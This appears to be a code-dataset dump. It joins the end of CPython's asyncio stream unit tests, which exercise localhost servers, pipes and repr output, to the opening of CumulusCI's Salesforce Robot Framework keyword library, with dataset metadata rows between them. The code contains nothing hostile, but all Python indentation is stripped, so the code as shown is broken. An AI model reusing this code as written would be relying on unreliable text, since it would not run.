q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('localhost', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
stream = await asyncio.connect(host, port)
while True:
stream.write(b"foo\n")
await stream.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test___repr__(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertEqual("<Stream mode=StreamMode.READ>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=123,
_asyncio_internal=True)
self.assertEqual("<Stream mode=StreamMode.READ limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_eof()
self.assertEqual("<Stream mode=StreamMode.READ eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'data')
self.assertEqual("<Stream mode=StreamMode.READ 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<Stream mode=StreamMode.READ exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
r"<Stream .+ waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<Stream mode=StreamMode.READ>", repr(stream))
def test___repr__transport(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<Stream mode=StreamMode.READ transport=<Transport>>",
repr(stream))
def test_IncompleteReadError_pickleable(self):
e = asyncio.IncompleteReadError(b'abc', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.partial, e2.partial)
self.assertEqual(e.expected, e2.expected)
def test_LimitOverrunError_pickleable(self):
e = asyncio.LimitOverrunError('message', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.consumed, e2.consumed)
def test_wait_closed_on_close_deprecated(self):
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = stream.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(stream.is_closing())
stream.close()
self.assertTrue(stream.is_closing())
self.loop.run_until_complete(stream.wait_closed())
def test_wait_closed_on_close_with_unread_data_deprecated(self):
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
stream.close()
self.loop.run_until_complete(stream.wait_closed())
def test_del_stream_before_sock_closing(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
async def test():
with test_utils.run_test_server() as httpd:
stream = await asyncio.connect(*httpd.address)
sock = stream.get_extra_info('socket')
self.assertNotEqual(sock.fileno(), -1)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
# drop refs to reader/writer
del stream
gc.collect()
# make a chance to close the socket
await asyncio.sleep(0)
self.assertEqual(1, len(messages), messages)
self.assertEqual(sock.fileno(), -1)
self.loop.run_until_complete(test())
self.assertEqual(1, len(messages), messages)
self.assertEqual('An open stream object is being garbage '
'collected; call "stream.close()" explicitly.',
messages[0]['message'])
def test_del_stream_before_connection_made(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
pr = _StreamProtocol(stream, loop=self.loop,
_asyncio_internal=True)
del stream
gc.collect()
tr, _ = self.loop.run_until_complete(
self.loop.create_connection(
lambda: pr, *httpd.address))
sock = tr.get_extra_info('socket')
self.assertEqual(sock.fileno(), -1)
self.assertEqual(1, len(messages))
self.assertEqual('An open stream was garbage collected prior to '
'establishing network connection; '
'call "stream.close()" explicitly.',
messages[0]['message'])
def test_async_writer_api(self):
async def inner(httpd):
stream = await asyncio.connect(*httpd.address)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
await stream.close()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_async_writer_api_exception_after_close(self):
async def inner(httpd):
stream = await asyncio.connect(*httpd.address)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
stream.close()
with self.assertRaises(ConnectionResetError):
await stream.write(b'data')
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_eof_feed_when_closing_writer(self):
# See http://bugs.python.org/issue35065
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address,
loop=self.loop))
wr.close()
f = wr.wait_closed()
self.loop.run_until_complete(f)
assert rd.at_eof()
f = rd.read()
data = self.loop.run_until_complete(f)
assert data == b''
self.assertEqual(messages, [])
def test_stream_reader_create_warning(self):
with contextlib.suppress(AttributeError):
del asyncio.StreamReader
with self.assertWarns(DeprecationWarning):
asyncio.StreamReader
def test_stream_writer_create_warning(self):
with contextlib.suppress(AttributeError):
del asyncio.StreamWriter
with self.assertWarns(DeprecationWarning):
asyncio.StreamWriter
def test_stream_reader_forbidden_ops(self):
async def inner():
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.write(b'data')
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.writelines([b'data', b'other'])
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
stream.write_eof()
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.drain()
self.loop.run_until_complete(inner())
def test_stream_writer_forbidden_ops(self):
async def inner():
stream = asyncio.Stream(mode=asyncio.StreamMode.WRITE,
_asyncio_internal=True)
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
stream.feed_data(b'data')
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readline()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readuntil()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.read()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readexactly(10)
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
async for chunk in stream:
pass
self.loop.run_until_complete(inner())
def _basetest_connect(self, stream):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = stream.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
stream.close()
self.loop.run_until_complete(stream.wait_closed())
self.assertEqual([], messages)
def test_connect(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
self.assertFalse(stream.is_server_side())
self._basetest_connect(stream)
@support.skip_unless_bind_unix_socket
def test_connect_unix(self):
with test_utils.run_test_unix_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect_unix(httpd.address))
self._basetest_connect(stream)
def test_stream_async_context_manager(self):
async def test(httpd):
stream = await asyncio.connect(*httpd.address)
async with stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(test(httpd))
def test_connect_async_context_manager(self):
async def test(httpd):
async with asyncio.connect(*httpd.address) as stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(test(httpd))
@support.skip_unless_bind_unix_socket
def test_connect_unix_async_context_manager(self):
async def test(httpd):
async with asyncio.connect_unix(httpd.address) as stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_unix_server() as httpd:
self.loop.run_until_complete(test(httpd))
def test_stream_server(self):
async def handle_client(stream):
self.assertTrue(stream.is_server_side())
data = await stream.readline()
await stream.write(data)
await stream.close()
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
# send a line
await stream.write(b"hello world!\n")
# read it back
msgback = await stream.readline()
await stream.close()
self.assertEqual(msgback, b"hello world!\n")
await srv.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
with contextlib.suppress(asyncio.CancelledError):
await server.serve_forever()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
def test_unix_stream_server(self):
async def handle_client(stream):
data = await stream.readline()
await stream.write(data)
await stream.close()
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect_unix(addr)
# send a line
await stream.write(b"hello world!\n")
# read it back
msgback = await stream.readline()
await stream.close()
self.assertEqual(msgback, b"hello world!\n")
await srv.close()
async def test():
with test_utils.unix_socket_path() as path:
async with asyncio.UnixStreamServer(handle_client, path) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
with contextlib.suppress(asyncio.CancelledError):
await server.serve_forever()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_inheritance_forbidden(self):
with self.assertRaises(TypeError):
class MyServer(asyncio.StreamServer):
pass
@support.skip_unless_bind_unix_socket
def test_unix_stream_server_inheritance_forbidden(self):
with self.assertRaises(TypeError):
class MyServer(asyncio.UnixStreamServer):
pass
def test_stream_server_bind(self):
async def handle_client(stream):
await stream.close()
async def test():
srv = asyncio.StreamServer(handle_client, '127.0.0.1', 0)
self.assertFalse(srv.is_bound())
self.assertEqual(0, len(srv.sockets))
await srv.bind()
self.assertTrue(srv.is_bound())
self.assertEqual(1, len(srv.sockets))
await srv.close()
self.assertFalse(srv.is_bound())
self.assertEqual(0, len(srv.sockets))
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_bind_async_with(self):
async def handle_client(stream):
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as srv:
self.assertTrue(srv.is_bound())
self.assertEqual(1, len(srv.sockets))
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_start_serving(self):
async def handle_client(stream):
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as srv:
self.assertFalse(srv.is_serving())
await srv.start_serving()
self.assertTrue(srv.is_serving())
await srv.close()
self.assertFalse(srv.is_serving())
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_close(self):
server_stream_aborted = False
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
self.assertEqual(b'', await stream.readline())
nonlocal server_stream_aborted
server_stream_aborted = True
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(server_stream_aborted)
def test_stream_server_abort(self):
server_stream_aborted = False
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
self.assertEqual(b'', await stream.readline())
nonlocal server_stream_aborted
server_stream_aborted = True
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.abort()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(server_stream_aborted)
def test_stream_shutdown_hung_task(self):
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
cancelled = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
try:
while True:
await asyncio.sleep(0.01)
except asyncio.CancelledError:
cancelled.set_result(None)
raise
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client,
'127.0.0.1',
0,
shutdown_timeout=0.3) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
await task
await cancelled
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(cancelled.done())
def test_stream_shutdown_hung_task_prevents_cancellation(self):
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
cancelled = self.loop.create_future()
do_handle_client = True
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
while do_handle_client:
with contextlib.suppress(asyncio.CancelledError):
await asyncio.sleep(0.01)
cancelled.set_result(None)
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client,
'127.0.0.1',
0,
shutdown_timeout=0.3) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
nonlocal do_handle_client
do_handle_client = False
await task
await cancelled
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(1, len(messages))
self.assertRegex(messages[0]['message'],
"<Task pending .+ ignored cancellation request")
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(cancelled.done())
def test_sendfile(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with open(support.TESTFN, 'wb') as fp:
fp.write(b'data\n')
self.addCleanup(support.unlink, support.TESTFN)
async def serve_callback(stream):
data = await stream.readline()
await stream.write(b'ack-' + data)
data = await stream.readline()
await stream.write(b'ack-' + data)
data = await stream.readline()
await stream.write(b'ack-' + data)
await stream.close()
async def do_connect(host, port):
stream = await asyncio.connect(host, port)
await stream.write(b'begin\n')
data = await stream.readline()
self.assertEqual(b'ack-begin\n', data)
with open(support.TESTFN, 'rb') as fp:
await stream.sendfile(fp)
data = await stream.readline()
self.assertEqual(b'ack-data\n', data)
await stream.write(b'end\n')
data = await stream.readline()
self.assertEqual(data, b'ack-end\n')
await stream.close()
async def test():
async with asyncio.StreamServer(serve_callback, '127.0.0.1', 0) as srv:
await srv.start_serving()
await do_connect(*srv.sockets[0].getsockname())
self.loop.run_until_complete(test())
self.assertEqual([], messages)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_connect_start_tls(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
# connect without SSL but upgrade to TLS just after
# connection is established
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
self.loop.run_until_complete(
stream.start_tls(
sslcontext=test_utils.dummy_ssl_context()))
self._basetest_connect(stream)
def test_repr_unbound(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve)
self.assertEqual('<StreamServer>', repr(srv))
await srv.close()
self.loop.run_until_complete(test())
def test_repr_bound(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve, '127.0.0.1', 0)
await srv.bind()
self.assertRegex(repr(srv), r'<StreamServer sockets=\(.+\)>')
await srv.close()
self.loop.run_until_complete(test())
def test_repr_serving(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve, '127.0.0.1', 0)
await srv.start_serving()
self.assertRegex(repr(srv), r'<StreamServer serving sockets=\(.+\)>')
await srv.close()
self.loop.run_until_complete(test())
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
async def test():
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async with asyncio.connect_read_pipe(pipeobj) as stream:
self.assertEqual(stream.mode, asyncio.StreamMode.READ)
os.write(wpipe, b'1')
data = await stream.readexactly(1)
self.assertEqual(data, b'1')
os.write(wpipe, b'2345')
data = await stream.readexactly(4)
self.assertEqual(data, b'2345')
os.close(wpipe)
self.loop.run_until_complete(test())
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
async def test():
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
async with asyncio.connect_write_pipe(pipeobj) as stream:
self.assertEqual(stream.mode, asyncio.StreamMode.WRITE)
await stream.write(b'1')
data = os.read(rpipe, 1024)
self.assertEqual(data, b'1')
await stream.write(b'2345')
data = os.read(rpipe, 1024)
self.assertEqual(data, b'2345')
os.close(rpipe)
self.loop.run_until_complete(test())
def test_stream_ctor_forbidden(self):
with self.assertRaisesRegex(RuntimeError,
"should be instantiated "
"by asyncio internals only"):
asyncio.Stream(asyncio.StreamMode.READWRITE)
if __name__ == '__main__':
unittest.main()
| 39.007259
| 85
| 0.582062
|
f722240a67244d196847090cdf5dd01aa951f23d
| 61,618
|
py
|
Python
|
cumulusci/robotframework/Salesforce.py
|
leboff/CumulusCI
|
81edbb1d64f2cc215a951c570052a1e423821cc1
|
[
"BSD-3-Clause"
] | null | null | null |
cumulusci/robotframework/Salesforce.py
|
leboff/CumulusCI
|
81edbb1d64f2cc215a951c570052a1e423821cc1
|
[
"BSD-3-Clause"
] | null | null | null |
cumulusci/robotframework/Salesforce.py
|
leboff/CumulusCI
|
81edbb1d64f2cc215a951c570052a1e423821cc1
|
[
"BSD-3-Clause"
] | null | null | null |
import importlib
import logging
import re
import time
from datetime import datetime
from dateutil.parser import parse as parse_date, ParserError
from pprint import pformat
from robot.libraries.BuiltIn import BuiltIn, RobotNotRunningError
from robot.utils import timestr_to_secs
from cumulusci.robotframework.utils import get_locator_module_name
from cumulusci.robotframework.form_handlers import get_form_handler
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import (
StaleElementReferenceException,
NoSuchElementException,
JavascriptException,
WebDriverException,
)
import faker
from simple_salesforce import SalesforceResourceNotFound
from cumulusci.robotframework.utils import selenium_retry, capture_screenshot_on_error
from SeleniumLibrary.errors import ElementNotFound, NoOpenBrowser
from urllib3.exceptions import ProtocolError
from cumulusci.core.template_utils import format_str
from cumulusci.robotframework import locator_manager
OID_REGEX = r"^(%2F)?([a-zA-Z0-9]{15,18})$"
STATUS_KEY = ("status",)
lex_locators = {} # will be initialized when Salesforce is instantiated
# https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_composite_sobjects_collections_create.htm
SF_COLLECTION_INSERTION_LIMIT = 200
@selenium_retry
class Salesforce(object):
"""A keyword library for working with Salesforce Lightning pages
While you can import this directly into any suite, the recommended way
to include this in a test suite is to import the ``Salesforce.robot``
resource file.
"""
ROBOT_LIBRARY_SCOPE = "GLOBAL"
def __init__(self, debug=False, locators=None):
self.debug = debug
self._session_records = []
# Turn off info logging of all http requests
logging.getLogger("requests.packages.urllib3.connectionpool").setLevel(
logging.WARN
)
if locators:
lex_locators.update(locators)
else:
self._init_locators()
self._faker = faker.Faker("en_US")
try:
self.builtin.set_global_variable("${faker}", self._faker)
except RobotNotRunningError:
# this only happens during unit tests, and we don't care.
pass
def _init_locators(self):
"""Load the appropriate locator file for the current version
If no version can be determined, we'll use the highest numbered
locator file name.
"""
try:
version = int(float(self.get_latest_api_version()))
except RobotNotRunningError:
# Likely this means we are running in the context of
# documentation generation. Setting the version to
# None will result in using the latest version of
# locators.
version = None
locator_module_name = get_locator_module_name(version)
self.locators_module = importlib.import_module(locator_module_name)
lex_locators.update(self.locators_module.lex_locators)
@property
def builtin(self):
return BuiltIn()
@property
def cumulusci(self):
return self.builtin.get_library_instance("cumulusci.robotframework.CumulusCI")
def initialize_location_strategies(self):
"""Initialize the Salesforce custom location strategies
Note: This keyword is called automatically from *Open Test Browser*
"""
if not self.builtin.get_variable_value(
"${LOCATION STRATEGIES INITIALIZED}", False
):
# this manages strategies based on locators in a dictionary
locator_manager.register_locators("sf", lex_locators)
locator_manager.add_location_strategies()
# these are more traditional location strategies based on keywords
# or functions
self.selenium.add_location_strategy(
"text", "Salesforce.Locate Element by Text"
)
self.selenium.add_location_strategy(
"title", "Salesforce.Locate Element by Title"
)
self.selenium.add_location_strategy("label", self.locate_element_by_label)
self.builtin.set_suite_variable("${LOCATION STRATEGIES INITIALIZED}", True)
@selenium_retry(False)
def _jsclick(self, locator):
"""Use javascript to click an element on the page
See https://help.salesforce.com/articleView?id=000352057&language=en_US&mode=1&type=1
"""
self.selenium.wait_until_page_contains_element(locator)
self.selenium.wait_until_element_is_enabled(locator)
for should_retry in (True, False):
try:
# Setting the focus first seems to be required as of Spring'20
# (read: without it, tests started failing in that release). I
# suspect it's because there is a focusOut handler on form
# fields which need to be triggered for data to be accepted.
element = self.selenium.get_webelement(locator)
self.selenium.driver.execute_script(
"arguments[0].focus(); arguments[0].click()", element
)
return
except StaleElementReferenceException:
if should_retry:
time.sleep(1)
else:
raise
def set_faker_locale(self, locale):
"""Set the locale for fake data
This sets the locale for all calls to the ``Faker`` keyword
and ``${faker}`` variable. The default is en_US
For a list of supported locales see
[https://faker.readthedocs.io/en/master/locales.html|Localized Providers]
in the Faker documentation.
Example
| Set Faker Locale fr_FR
| ${french_address}= Faker address
"""
try:
self._faker = faker.Faker(locale)
except AttributeError:
raise Exception(f"Unknown locale for fake data: '{locale}'")
def get_fake_data(self, fake, *args, **kwargs):
"""Return fake data
This uses the [https://faker.readthedocs.io/en/master/|Faker]
library to provide fake data in a variety of formats (names,
addresses, credit card numbers, dates, phone numbers, etc) and
locales (en_US, fr_FR, etc).
The _fake_ argument is the name of a faker property such as
``first_name``, ``address``, ``lorem``, etc. Additional
arguments depend on type of data requested. For a
comprehensive list of the types of fake data that can be
generated see
[https://faker.readthedocs.io/en/master/providers.html|Faker
providers] in the Faker documentation.
The return value is typically a string, though in some cases
some other type of object will be returned. For example, the
``date_between`` fake returns a
[https://docs.python.org/3/library/datetime.html#date-objects|datetime.date
object]. Each time a piece of fake data is requested it will
be regenerated, so that multiple calls will usually return
different data.
This keyword can also be called using robot's extended variable
syntax using the variable ``${faker}``. In such a case, the
data being asked for is a method call and arguments must be
enclosed in parentheses and be quoted. Arguments should not be
quoted when using the keyword.
To generate fake data for a locale other than en_US, use
the keyword ``Set Faker Locale`` prior to calling this keyword.
Examples
| # Generate a fake first name
| ${first_name}= Get fake data first_name
| # Generate a fake date in the default format
| ${date}= Get fake data date
| # Generate a fake date with an explicit format
| ${date}= Get fake data date pattern=%Y-%m-%d
| # Generate a fake date using extended variable syntax
| Input text //input ${faker.date(pattern='%Y-%m-%d')}
"""
try:
return self._faker.format(fake, *args, **kwargs)
except AttributeError:
raise Exception(f"Unknown fake data request: '{fake}'")
def get_latest_api_version(self):
return self.cumulusci.org.latest_api_version
def create_webdriver_with_retry(self, *args, **kwargs):
"""Call the Create Webdriver keyword.
Retry on connection resets which can happen if custom domain propagation is slow.
"""
# Get selenium without referencing selenium.driver which doesn't exist yet
selenium = self.builtin.get_library_instance("SeleniumLibrary")
for _ in range(12):
try:
return selenium.create_webdriver(*args, **kwargs)
except ProtocolError:
# Give browser some more time to start up
time.sleep(5)
raise Exception("Could not connect to remote webdriver after 1 minute")
@capture_screenshot_on_error
def click_modal_button(self, title):
"""Clicks a button in a Lightning modal."""
locator = lex_locators["modal"]["button"].format(title)
self.selenium.wait_until_page_contains_element(locator)
self.selenium.wait_until_element_is_enabled(locator)
self._jsclick(locator)
@capture_screenshot_on_error
def click_object_button(self, title):
"""Clicks a button in an object's actions."""
locator = lex_locators["object"]["button"].format(title=title)
self._jsclick(locator)
self.wait_until_modal_is_open()
@capture_screenshot_on_error
def scroll_element_into_view(self, locator):
"""Scroll the element identified by 'locator'
This is a replacement for the keyword of the same name in
SeleniumLibrary. The SeleniumLibrary implementation uses
an unreliable method on Firefox. This keyword uses
a more reliable technique.
For more info see https://stackoverflow.com/a/52045231/7432
"""
element = self.selenium.get_webelement(locator)
self.selenium.driver.execute_script("arguments[0].scrollIntoView()", element)
@capture_screenshot_on_error
def load_related_list(self, heading, tries=10):
"""Scrolls down until the specified related list loads.
If the related list isn't found, the keyword will scroll down
in 100 pixel increments to trigger lightning into loading the
list. This process of scrolling will be repeated until the
related list has been loaded or we've tried several times
(the default is 10 tries)
"""
locator = lex_locators["record"]["related"]["card"].format(heading)
for i in range(tries):
try:
self.selenium.scroll_element_into_view(locator)
return
except (ElementNotFound, JavascriptException, WebDriverException):
self.builtin.log(
f"related list '{heading}' not found; scrolling...", "DEBUG"
)
self.selenium.execute_javascript("window.scrollBy(0, 100)")
self.wait_for_aura()
raise AssertionError(f"Timed out waiting for related list '{heading}' to load.")
